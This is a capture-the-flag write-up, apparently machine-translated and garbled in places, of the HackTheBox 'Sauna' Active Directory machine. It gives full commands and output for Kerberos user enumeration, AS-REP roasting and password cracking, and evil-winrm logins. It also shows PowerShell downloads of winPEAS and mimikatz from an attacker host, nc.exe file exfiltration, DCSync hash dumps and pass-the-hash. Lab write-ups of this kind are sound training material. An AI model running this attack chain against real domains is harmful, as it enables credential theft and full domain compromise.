disclaimer
The hosts infiltrated in this article are legally authorized. The tools and methods used in this article are only for learning and communication. Please do not use the tools and infiltration ideas used in this article for any illegal purposes. I am not responsible for any consequences arising therefrom, nor for any misuse or damage caused
Service to detect
Port found
Chrysene ─(root💀kali)-[~/ HTB /Sauna] ├ ─# nmap-p - -PN 10.10.10.175 -- Open Host discovery disabled (-PN). All addresses will be Marked 'up' and scan times will be slower. Starting Nmap 7.91 (https://nmap.org) at 2022-01-03 09:23 EST Nmap scan Report for 10.10.10.175 Host is up (0.26s latency). 65515 filtered ports Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE 53/tcp open domain 80/tcp open http 88/tcp open kerberos-sec 135/tcp open msrpc 139/tcp open netbios-ssn 389/tcp open ldap 445/tcp open microsoft-ds 464/tcp open kpasswd5 593/tcp open http-rpc-epmap 636/tcp open ldapssl 3268/tcp open globalcatLDAP 3269/tcp open globalcatLDAPssl 5985/tcp open wsman 9389/tcp open adws 49667/tcp open unknown 49673/tcp open unknown 49674/tcp open unknown 49677/tcp open unknown 49689/tcp open unknown 49697/tcp open unknown Nmap done: 1 IP address (1 Host up) Scanned in 1192.54 secondsCopy the code
Port Details
─ ─ (root 💀 kali) - ~ / HTB/Sauna └ ─ # nmap - Pn 10.10.10.175 - p - sV - A - O 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49667,49673,49674,49677,49686,49697 Host discovery disabled All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 (https://nmap.org) at 2022-01-03 09:45 EST Nmap Scan Report for 10.10.10.175 Host is up (latency). PORT STATE SERVICE VERSION 53/ TCP The open domain Simple DNS Plus 80 / TCP open HTTP Microsoft IIS HTTPD | HTTP 10.0 - the methods: | _ Potentially risky the methods: TRACE | _http - server - the header: Microsoft IIS / 10.0 | _http - title: Egotistical Bank: : Home 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-01-03 22:45:17Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC Over HTTP 1.0 636/ TCP Open tcpWrapped 3268/ TCP Open LDAP Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-first-site-name) 3269/ TCP open tcpWrapped 5985/ TCP Open HTTP Microsoft HTTPAPI HTTPD 2.0 (SSDP/UPnP) | _http - server - the header: Microsoft - 2.0 - / - HTTPAPI | _http - title: Not Found 9389 / TCP open adws? | fingerprint - strings: | DNSStatusRequestTCP, Kerberos, SMBProgNeg, afp, oracle-tns: |_ Ihttp://schemas.microsoft.com/ws/2006/05/framing/faults/UnsupportedVersion 49667/tcp open msrpc Microsoft Windows RPC 49673/ TCP open NCACN_http Microsoft Windows RPC over HTTP 1.0 49674/ TCP open MSRPC Microsoft Windows RPC 49677/ TCP open msrpc Microsoft Windows RPC 49686/tcp filtered unknown 49697/tcp open msrpc Microsoft Windows RPC 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF - Port9389 - TCP: V = I = D = 1/7% 7.91% 3% Time = P = x86_64 d30c0c % 61 - PC - Linux - gnu % r (DNS SF:StatusRequestTCP,4B,"\x08Ihttp://schemas\.microsoft\.com/ws/2006/05/fra SF:ming/faults/UnsupportedVersion")%r(Kerberos,4B,"\x08Ihttp://schemas\.mi SF:crosoft\.com/ws/2006/05/framing/faults/UnsupportedVersion")%r(SMBProgNe SF:g,4B,"\x08Ihttp://schemas\.microsoft\.com/ws/2006/05/framing/faults/Uns SF:upportedVersion")%r(oracle-tns,4B,"\x08Ihttp://schemas\.microsoft\.com/ SF:ws/2006/05/framing/faults/UnsupportedVersion")%r(afp,4B,"\x08Ihttp://sc SF:hemas\.microsoft\.com/ws/2006/05/framing/faults/UnsupportedVersion"); Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port OS fingerprint not ideal because: Missing a closed TCP port so results incomplete No OS matches for host Network Distance: 2 hops Service Info: Host: SAUNA; OS: Windows; CPE: CPE/o: Microsoft: Windows Host script results: | _clock - skew: 8 h00m00s | smb2 ws-security - mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2022-01-03T22:46:21 |_ start_date: N/A TRACEROUTE (using port 445/ TCP) HOP RTT ADDRESS 1 253.57 ms 10.10.14.1 2 254.12 ms 10.10.10.175 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 Host up) Scanned in 121.12 secondsCopy the code
With DNS, Kerberos and LDAP, this is clearly a DC server.
Enumeration of the domain name
Chrysene ─(root💀kali)-[~/ HTB /Sauna] ├ ─# crackmapexec SMB 10.10.10.762 -u 'anonymous' -p '- Shares SMB 10.10.10.762 445 Sauna [*] Windows 10.0 Build 17763 X64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False) SMB 10.10.10.175 445 SAUNA [-] EGOTISTICAL-BANK.LOCAL\anonymous: STATUS_LOGON_FAILURECopy the code
Get a domain name: EGOTISTICAL- bank.local
I went through a long round and couldn’t get anything useful. Cannot open the SMB share directory and does not know any useful user names.
Kerberos
Use nmap to enumerate kerberos user names
├ ─(root💀kali)-[~/ HTB /Sauna] garbage # nmap -p 88 --script= krb5-enus-users --script-args krb5-enum-users.realm="EGOTISTICAL-BANK.LOCAL",userdb=/usr/share/wordlists/SecLists/Usernames/cirt-default-usernames.txt 10.10.10.175 Starting Nmap 7.91 (https://nmap.org) at 2022-01-03 07:03 EST Nmap Scan Report for 10.10.10.175 Host is Up latency (0.30 s). The PORT STATE SERVICE 88 / TCP open kerberos - SEC | krb5 - enum - the users: | Discovered Kerberos principals | [email protected] | [email protected] |_ [email protected] Nmap done: 1 IP address (1 host up) Scanned in 41.32 secondsCopy the code
There is only one user name administrator, which obviously we do not have permission at present
The port 80 HTTP service looks like a company introduction page, trying to make a list of users
Cewl -d 1 -m 3 -w user. TXT 10.10.10.175
Enumerates kerberos user names with the generated list
Chrysene ─(root💀kali)-[~/ HTB /Sauna] ├ ─# nmap -p 88 --script=krb5-enum-users --script-args Krb5-enum users. Realm ="EGOTISTICAL BANK.LOCAL",userdb=/root/ HTB /Sauna/user.txt 10.10.10.175 https://nmap.org) at 2022-01-03 08:00 EST Nmap Scan report for 10.10.10.175 Host is up (latency). PORT STATE SERVICE 88/tcp open kerberos-sec | krb5-enum-users: | Discovered Kerberos principals |_ [email protected] Nmap done: 1 IP address (1 Host up) Scanned in 16.22 secondsCopy the code
You get a new user name sauna
web
On the About US page, the team member name is exposed. Manually create a user name dictionary and add the two Kerberos user names we found above to this dictionary
Chrysene ─(root💀kali)-[~/ HTB /Sauna] ├ ─# cat user FergusSmith FergusSmith Coins Shaun Coins Shaun.Coins ShaunCoins Shaun.C scoins Hugo Bear Hugo Bear Hugo.Bear HugoBear Hugo.B hbear Bowie Taylor Bowie Taylor Bowie.Taylor BowieTaylor Bowie.T btaylor Sophie Driver Sophie Driver Sophie.Driver SophieDriver Sophie.D sdriver Steven Kerb Steven Kerb Steven.Kerb StevenKerb Steven.K skerb sauna administratorCopy the code
Use getnusers.py to try to request tickets from Kerberos that do not require pre-authentication
Hacktricks:
That means that anyone can send an AS_REQ request to the DC on behalf of any of those users, and receive an AS_REP message. This last kind of message contains a chunk of data encrypted with the original user key, derived from its password. Then, by using this message, the user password could be cracked offline.
┌ ─ ─ (root 💀 kali) - ~ / HTB/Sauna └ ─ # python3 / usr/share/doc/python3 - impacket/examples/GetNPUsers py EGOTISTICAL - BANK. LOCAL / -usersfile /root/ HTB /Sauna/ user-outputfile hashes. Asreproast-dc-ip 10.10.10.175Copy the code
You can see you got an FSmith ticket
┌ ─ ─ (root 💀 kali) - ~ / HTB/Sauna └ ─ # cat hashes. Asreproast [email protected]:85853ae8057c9c84f1ae5e3860cfcf35$29c704dfe2ce770414e478fcb530171c1b749dce351 87d79c2679d93eaa6d2f5cd068123b2e4bbe3f59a94c1e589aa494ab81aa8d5c5c4d0bfdfa7a77320c3651f69e58550327e188e1b551f4d7d5a85fd0 d541793c37e1908197d535f32ac12442756f3d5264610f155bcf1f341b29fa07234aaf7cd10a74c8fea80dddf6a8f5364633faf65313b81401888d24 115e8c1bdb6fa2b45cf88b95c7f0b02f64cdf3ac44eb71fca52b9c187fa91bbcc9bd743ea59b8625abb2e8c94e632df4f3e2a8d50ed035e8b796e1ee 1d57b1d6d85b4813af2b76c2af16da1ac9b2880f20c2afdac285dc57c200595de6d22df40eba458438d6b3082b3a66bebeeea0e04aaccCopy the code
John crack
┌ ─ ─ (root 💀 kali) - ~ / HTB/Sauna └ ─ # John -- wordlist = / usr/share/wordlists unencrypted usernames. TXT hashes. Asreproast Using the default input encoding: UTF-8 Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x]) Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status Thestrokes23 ([email protected]) 1g 0:00:00:10 DONE (2022-01-03 10:33) 0.09775g/s 1030Kp/s 1030Kc/s 1030Kc/s Thing.. Thehunter22 Use the "--show" option to display all of the cracked passwords reliably Session completedCopy the code
foodhold
Get a user id: fsmith:Thestrokes23
Log in with evil-winrm and get foodhold and user.txt
Chrysene ─(root💀kali)-[~/ HTB /Sauna] ├ ─# evil-winrm - I 10.10.10.175 -u 'fsmith' -p 'Thestrokes23' evil-Winrm shell V3.3 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\FSmith\Documents> whoami egotisticalbank\fsmithCopy the code
Right to mention
Transfer Winpeas and NC to target: powershell -c “(new-object System.Net.WebClient). DownloadFile (‘ http://10.10.16.3:8000/winPEASx64.exe ‘, ‘C: \ Users \ FSmith \ Desktop \ winPEASx64 exe’)”
Execute winpea and redirect to O.txt:
&{C:\Users\FSmith\Desktop\winPEASx64.exe} > o.txt
Poweshell sends files using nC.exe
Receive NC-NLVP 4444 > O.txt
Transmit the Get – Content o.t xt. | \ nc exe – 4444 | w 3 10.10.16.3 tee test. The log
A user password was found
???????????????????? Looking for AutoLogon credentials Some AutoLogon credentials were found DefaultDomainName : EGOTISTICALBANK DefaultUserName : EGOTISTICALBANK\svc_loanmanager DefaultPassword : Moneymakestheworldgoround!Copy the code
View target aircraft users
*Evil-WinRM* PS C:\> net users User accounts for \\ ------------------------------------------------------------------------------- Administrator FSmith Guest HSmith krbtgt svc_loanmgr The command completed with one or more errors.Copy the code
Log in to svc_loanmgr with evil-winrm to view user information
*Evil-WinRM* PS C:\> net users svc_loanmgr User name svc_loanmgr Full Name L Manager Comment User's comment Country/region code 000 (System Default) Account active Yes Account expires Never Password last set 1/24/2020 3:48:31 PM Password expires Never Password changeable 1/25/2020 3:48:31 PM Password required Yes User may change password Yes Workstations allowed All Logon script User profile Home directory Last logon Never Logon hours allowed All Local Group Memberships *Remote Management Use Global Group memberships *Domain Users The command completed successfully.Copy the code
See svc_loanmgr in the Remote Management Use group
See the explanation for this group
*Evil-WinRM* PS C:\Users\FSmith\Desktop> net localgroup "Remote Management Users" Alias name Remote Management Users Comment Members of this group can access WMI resources over management protocols (such as WS-Management via the Windows Remote Management service). This applies only to WMI namespaces that grant access to the user. Members ------------------------------------------------------------------------------- FSmith svc_loanmgr The command completed successfully.Copy the code
Looks like a remote access group.
We tried to steal user hashes using DCSync attacks
Hacktricks explains DCSync as follows:
- The DCSync attack simulates the behavior of a Domain Controller and asks other Domain Controllers to replicate information using the Directory Replication Service Remote Protocol (MS-DRSR). Because MS-DRSR is a valid and necessary function of Active Directory, it cannot be turned off or disabled.
- By default only Domain Admins, Enterprise Admins, Administrators, and Domain Controllers groups have the required privileges.
- If any account passwords are stored with reversible encryption, an option is available in Mimikatz to return the password in clear text
The default user groups that have permission to perform DCSync are: Domain Admins, Enterprise Admins, Administrators, and Domain Controllers
Pass mimikatz.exe from Kali to target:
powershell -c "(new-object System.Net.WebClient). DownloadFile (' http://10.10.16.3:8000/mimikatz.exe ', 'C: \ Users \ svc_loanmgr \ Documents \ mimikatz exe')"
Run the following command to trigger DC synchronization
mimikatz.exe privilege::debug "lsadump::dcsync /domain:EGOTISTICAL-BANK.LOCAL /all /csv" exit
You can see that the user’s hash is exported
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> ./mimikatz.exe privilege::debug "lsadump::dcsync /domain:EGOTISTICAL bank. LOCAL /all/CSV "exit.#####. Mimikatz 2.2.0 (x64) #19041 Sep 18 2020 19:18:29.## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( [email protected] ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/ mimikatz(commandline) # privilege::debug ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061 mimikatz(commandline) # lsadump::dcsync /domain:EGOTISTICAL-BANK.LOCAL /all /csv [DC] 'EGOTISTICAL-BANK.LOCAL' will be the domain [DC] 'SAUNA.EGOTISTICAL-BANK.LOCAL' will be the DC server [DC] Exporting domain 'EGOTISTICAL-BANK.LOCAL' 502 krbtgt 4a8899428cad97676ff802229e466e2c 514 1103 HSmith 58a52d36c84fb7f5f1beab9a201db1dd 66048 1000 SAUNA$ 230699e71e07d687981fc0685082b5cc 532480 500 Administrator 823452073d75b9d1cf70ebdf86c7f98e 66048 1105 FSmith 58a52d36c84fb7f5f1beab9a201db1dd 4260352 1108 svc_loanmgr 9cb31797c39a9b170b04058ba2bba48c 66048 mimikatz(commandline) # exit Bye!Copy the code
Use evil-winrm to log in directly to Administrator (pass-the-hash) with a hash password
┌ ─ ─ (root 💀 kali) - ~ / HTB/Sauna └ ─ # evil - winrm -u Administrator - H 823452073 d75b9d1cf70ebdf86c7f98e -i 10.10.10.175 Evil-winrm shell V3.2 Warning: Remote path Completions is disabled due to Ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Administrator\Documents> whoami egotisticalbank\administratorCopy the code
conclusion
From the information presented on the Web page, we guessed that a user name using getnpusers.py tried to request kerberos tickets that did not require pre-authentication, so we got foodhold using Winpeas, we enumerated another user’s clear text credentials, So we can raise rights to svc_loanmgr using DCSync to get the hashed password of the administrator, thus raising rights to the administrator
supplement
secretsdump.py
Secretsdump. py can also expose other users’ hashed passwords using DCSync after obtaining svc_loanmgr’s credentials:
┌ ─ ─ (root 💀 kali) - ~ / HTB/Sauna └ ─ # python3 / usr/share/doc/python3 - impacket/examples/secretsdump py EGOTISTICALBANK/svc_loanmgr:Moneymakestheworldgoround\\! @10.10.10.175 Impacket v0.9.24.dev1+20210906.175840.50 C76958 - Copyright 2021 SecureAuth Corporation [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c::: EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd::: EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd::: EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c::: SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:230699e71e07d687981fc0685082b5cc::: [*] Kerberos keys grabbed Administrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657 Administrator:aes128-cts-hmac-sha1-96:a9f3769c592a8a231c3c972c4050be4e Administrator:des-cbc-md5:fb8f321c64cea87f krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24 krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9 krbtgt:des-cbc-md5:c170d5dc3edfc1d9 EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324 EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9 EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7 EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2 EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaa cba EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2 SAUNA$:aes256-cts-hmac-sha1-96:8dccc32df17c3189f01f7702e6198f9a01199229d04420d830bca8dc8a1b483e SAUNA$:aes128-cts-hmac-sha1-96:a2927c8ea3e312d65894d9b1e508931f SAUNA$:des-cbc-md5:7c2c156d022c0131 [*] Cleaning up...Copy the code
How do I know if my account has permission to use DCSync?
Download powerview.ps1 locally
Log on to the target
┌ ─ ─ (root 💀 kali) - ~ / HTB/Sauna └ ─ # evil - winrm -i 10.10.10.175 -u 'svc_loanmgr' -p 'Moneymakestheworldgoround! ' -s '/root/PowerSploit/Recon'Copy the code
The introduction of PowerView. Ps1
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> PowerView.ps1
Copy the code
Check the domain permissions of svc_loanmgr and Fsmith
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> Get-ObjectAcl -DistinguishedName "dc=EGOTISTICAL-BANK,dc=LOCAL" -ResolveGUIDs | ? {$_.IdentityReference -match "svc_loanmgr|Fsmith"}
InheritedObjectType : All
ObjectDN : DC=EGOTISTICAL-BANK,DC=LOCAL
ObjectType : All
IdentityReference : EGOTISTICALBANK\FSmith
IsInherited : False
ActiveDirectoryRights : ReadProperty, GenericExecute
PropagationFlags : None
ObjectFlags : None
InheritanceFlags : None
InheritanceType : None
AccessControlType : Allow
ObjectSID : S-1-5-21-2966785786-3096785034-1186376766
/usr/lib/ruby/vendor_ruby/net/ntlm/client/session.rb:39: warning: constant OpenSSL::Cipher::Cipher is deprecated
/usr/lib/ruby/vendor_ruby/net/ntlm/client/session.rb:128: warning: constant OpenSSL::Cipher::Cipher is deprecated
/usr/lib/ruby/vendor_ruby/net/ntlm/client/session.rb:138: warning: constant OpenSSL::Cipher::Cipher is deprecated
InheritedObjectType : All
ObjectDN : DC=EGOTISTICAL-BANK,DC=LOCAL
ObjectType : All
IdentityReference : EGOTISTICALBANK\svc_loanmgr
IsInherited : False
ActiveDirectoryRights : ReadProperty, GenericExecute
PropagationFlags : None
ObjectFlags : None
InheritanceFlags : None
InheritanceType : None
AccessControlType : Allow
ObjectSID : S-1-5-21-2966785786-3096785034-1186376766
InheritedObjectType : All
ObjectDN : DC=EGOTISTICAL-BANK,DC=LOCAL
ObjectType : DS-Replication-Get-Changes
IdentityReference : EGOTISTICALBANK\svc_loanmgr
IsInherited : False
ActiveDirectoryRights : ExtendedRight
PropagationFlags : None
ObjectFlags : ObjectAceTypePresent
InheritanceFlags : None
InheritanceType : None
AccessControlType : Allow
ObjectSID : S-1-5-21-2966785786-3096785034-1186376766
InheritedObjectType : All
ObjectDN : DC=EGOTISTICAL-BANK,DC=LOCAL
ObjectType : DS-Replication-Get-Changes-All
IdentityReference : EGOTISTICALBANK\svc_loanmgr
IsInherited : False
ActiveDirectoryRights : ExtendedRight
PropagationFlags : None
ObjectFlags : ObjectAceTypePresent
InheritanceFlags : None
InheritanceType : None
AccessControlType : Allow
ObjectSID : S-1-5-21-2966785786-3096785034-1186376766
Copy the code
Note that the ObjectType shows that svc_loanmgr has ds-replication-get-changes and DS-replication-get-changes-all indicating that DCSync is available to the user. Refer to this article
In addition, you can use Bloodhound to check the domain permissions of your current account, as well as to see if you have DCSync permission.
About Uploading and downloading
I only know this from watching the video of IppSec. After logging in to evil-winrm, you can directly upload and download files through the upload and Download commands. Oh, the principle is so convenient, and the position is changed.